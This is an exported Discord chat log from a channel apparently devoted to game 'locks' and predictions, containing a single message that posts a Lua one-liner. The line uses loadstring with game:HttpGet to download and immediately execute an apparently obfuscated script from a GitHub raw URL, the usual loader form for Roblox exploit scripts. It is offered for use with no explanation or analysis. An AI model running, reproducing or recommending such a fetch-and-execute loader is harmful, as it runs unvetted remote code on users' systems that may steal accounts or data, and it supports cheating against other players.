==============================================================
Guild: VAULT ALL LOCKERS NEED |  /prediction
Channel: locks / streamable-v6
==============================================================

[PM] xeno#0666
```lua
loadstring(game:HttpGet("https://raw.githubusercontent.com/GuizzyisbackV2LOL/PrimeX1Updated/main/LuaObf"))() 
```


==============================================================
Exported 1 message(s)
==============================================================
